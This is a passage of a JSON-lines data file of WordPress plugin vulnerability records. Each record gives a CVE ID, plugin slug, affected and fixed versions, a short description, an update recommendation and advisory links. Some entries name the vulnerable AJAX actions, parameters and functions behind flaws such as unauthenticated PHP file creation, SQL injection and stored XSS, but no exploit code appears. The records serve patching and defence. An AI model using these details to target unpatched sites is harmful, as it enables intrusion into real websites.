version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036754\\\/plugin-groups\\\/trunk\\\/classes\\\/class-plugin-groups.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036754\\\/plugin-groups\\\/trunk\\\/classes\\\/class-plugin-groups.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4443","slug":"quadmenu","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The WordPress Mega Menu plugin for WordPress is vulnerable to Arbitrary File Creation in versions up to, and including, 2.0.6 via the compiler_save AJAX action. This makes it possible for unauthenticated attackers to create arbitrary PHP files that can be used to execute malicious code.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04003542-fd62-4587-9834-70e7fe8f08ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04003542-fd62-4587-9834-70e7fe8f08ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/sh3llcon.org\\\/la-debilidad-de-wordpress\\\/\",\"name\":\"https:\\\/\\\/sh3llcon.org\\\/la-debilidad-de-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wordpress-mega-menu-quadmenu-remote-code-execution-2-0-6\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wordpress-mega-menu-quadmenu-remote-code-execution-2-0-6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13901","slug":"counter-box","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-box\\\/trunk\\\/admin\\\/assets\\\/js\\\/5.builder.js#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-box\\\/trunk\\\/admin\\\/assets\\\/js\\\/5.builder.js#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247696\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247696\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/251b17a7-781f-4f17-af90-9a6fbae69243?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/251b17a7-781f-4f17-af90-9a6fbae69243?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10045","slug":"transients-manager","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The Transients Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the process_actions function. This makes it possible for unauthenticated attackers to delete transients via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b8b5a2-979d-42d0-86f5-48ee73162d22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b8b5a2-979d-42d0-86f5-48ee73162d22?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php#L993\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php#L993\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171619\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171619\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4399","slug":"edwiser-bridge","versionEndExcluding":"2.0.7","description":"The Edwiser Bridge plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the user_data_synchronization_initiater(), course_synchronization_initiater(), users_link_to_moodle_synchronization(), connection_test_initiater(), admin_menus(), and subscribe_handler() function. This makes it possible for unauthenticated attackers to perform unauthorized actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2478642%40edwiser-bridge&new=2478642%40edwiser-bridge&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2478642%40edwiser-bridge&new=2478642%40edwiser-bridge&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6450dafd-5992-4831-87af-e5e47cc8663e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6450dafd-5992-4831-87af-e5e47cc8663e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7082","slug":"easy-table-of-contents","versionImpact":"2.0.67.1","versionEndExcluding":"2.0.68","description":"The Easy Table of Contents WordPress plugin before 2.0.68 does not sanitise and escape some parameters, which could allow users with a role as low as Editor to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.0.68, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30e685-00fa-4dbb-b516-2d14e4b13697\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30e685-00fa-4dbb-b516-2d14e4b13697\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6334","slug":"easy-table-of-contents","versionImpact":"2.0.67","versionEndExcluding":"2.0.67.1","description":"The Easy Table of Contents WordPress plugin before 2.0.67.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.0.67.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c09083c-6960-4369-8c5c-ad20e34aaa8b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c09083c-6960-4369-8c5c-ad20e34aaa8b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5573","slug":"easy-table-of-contents","versionImpact":"2.0.65","versionEndExcluding":"2.0.66","description":"The Easy Table of Contents WordPress plugin before 2.0.66 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.0.66, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b01044b-355f-40d3-8e11-23a890f98c76\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b01044b-355f-40d3-8e11-23a890f98c76\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12513","slug":"contests-from-rewards-fuel","versionImpact":"2.0.65","versionEndExcluding":"2.0.66","description":"The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RF_CONTEST' shortcode in all versions up to, and including, 2.0.65 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.66, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208765%40contests-from-rewards-fuel&new=3208765%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208765%40contests-from-rewards-fuel&new=3208765%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c89934b1-5e3c-4bf2-8d36-17c4268ccd4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c89934b1-5e3c-4bf2-8d36-17c4268ccd4e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1787","slug":"contests-from-rewards-fuel","versionImpact":"2.0.64","versionEndExcluding":"2.0.65","description":"The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'update_rewards_fuel_api_key' parameter in all versions up to, and including, 2.0.64 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.65, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eeec949-e440-4df3-8c26-db92498cada3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eeec949-e440-4df3-8c26-db92498cada3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1785","slug":"contests-from-rewards-fuel","versionImpact":"2.0.62","versionEndExcluding":"2.0.63","description":"The Contests by Rewards Fuel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.62. This is due to missing or incorrect nonce validation on the ajax_handler() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site's user with the edit_posts capability into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.63, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6282","slug":"master-addons","versionImpact":"2.0.6.4","versionEndExcluding":"2.0.6.5","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.","recommendation":"Update to version 2.0.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/tags\\\/2.0.6.2\\\/assets\\\/js\\\/master-addons-scripts.js#L3398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/tags\\\/2.0.6.2\\\/assets\\\/js\\\/master-addons-scripts.js#L3398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146230\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146230\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5542","slug":"master-addons","versionImpact":"2.0.6.1","versionEndExcluding":"2.0.6.2","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Navigation Menu widget of the plugin's Mega Menu extension in all versions up to, and including, 2.0.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5151f429-b1f3-43d4-94cf-3ff382b80190?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5151f429-b1f3-43d4-94cf-3ff382b80190?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5382","slug":"master-addons","versionImpact":"2.0.6.1","versionEndExcluding":"2.0.6.2","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ma-template' REST API route in all versions up to, and including, 2.0.6.1. This makes it possible for unauthenticated attackers to create or modify existing Master Addons templates or make settings modifications related to these templates.","recommendation":"Update to version 2.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3820f80-9b80-4672-b2ff-3864793d2de2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3820f80-9b80-4672-b2ff-3864793d2de2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4580","slug":"master-addons","versionImpact":"2.0.6.0","versionEndExcluding":"2.0.6.1","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in versions up to, and including, 2.0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e3ac84-dd82-42b0-80b9-c876731170d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e3ac84-dd82-42b0-80b9-c876731170d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L1068\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L1068\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087193\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087193\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3134","slug":"master-addons","versionImpact":"2.0.6.0","versionEndExcluding":"2.0.6.1","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the title_html_tag attribute in all versions up to, and including, 2.0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6106c972-5475-4c19-8630-3a01edc616ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6106c972-5475-4c19-8630-3a01edc616ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3087193%40master-addons%2Ftrunk&old=3078134%40master-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3087193%40master-addons%2Ftrunk&old=3078134%40master-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13806","slug":"authors-list","versionImpact":"2.0.6","versionEndExcluding":"2.0.6.1","description":"The The Authors List plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.0.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246757%40authors-list&new=3246757%40authors-list&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246757%40authors-list&new=3246757%40authors-list&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbfa20ad-6411-4054-9973-cb12d17c57f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbfa20ad-6411-4054-9973-cb12d17c57f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4265","slug":"master-addons","versionImpact":"2.0.5.9","versionEndExcluding":"2.0.6.0","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in versions up to, and including, 2.0.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a48769-94d9-459f-b34b-fdfe4c10b36c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a48769-94d9-459f-b34b-fdfe4c10b36c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-logo-slider\\\/ma-logo-slider.php#L825\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-logo-slider\\\/ma-logo-slider.php#L825\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-carousel\\\/ma-image-carousel.php#L915\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-carousel\\\/ma-image-carousel.php#L915\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078134\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078134\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5969","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The AIomatic - Automatic AI Content Writer for WordPress is vulnerable to arbitrary email sending vulnerability in versions up to, and including, 2.0.5. This is due to insufficient limitations on the email recipient and the content in the 'aiomatic_send_email' function which are reachable via AJAX. This makes it possible for unauthenticated attackers to send emails with any content to any recipient.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5be40f-89da-4b97-9a85-527602d84c4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5be40f-89da-4b97-9a85-527602d84c4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369?srsltid=AfmBOornCSKshlaSyZi2nonTcpSskMpBNJpdAS_No91A5V5lTIAD1h8S\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369?srsltid=AfmBOornCSKshlaSyZi2nonTcpSskMpBNJpdAS_No91A5V5lTIAD1h8S\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4490","slug":"wp-job-portal","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The WP Job Portal WordPress plugin through 2.0.3 does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/986024f0-3c8d-44d8-a9c9-1dd284d7db0d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/986024f0-3c8d-44d8-a9c9-1dd284d7db0d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13380","slug":"alex-reservations","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The Alex Reservations: Smart Restaurant Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rr_form' shortcode in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alex-reservations\\\/trunk\\\/includes\\\/shortcodes.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alex-reservations\\\/trunk\\\/includes\\\/shortcodes.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229743\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229743\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89ddede9-3170-48bb-aae5-14f915330f67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89ddede9-3170-48bb-aae5-14f915330f67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
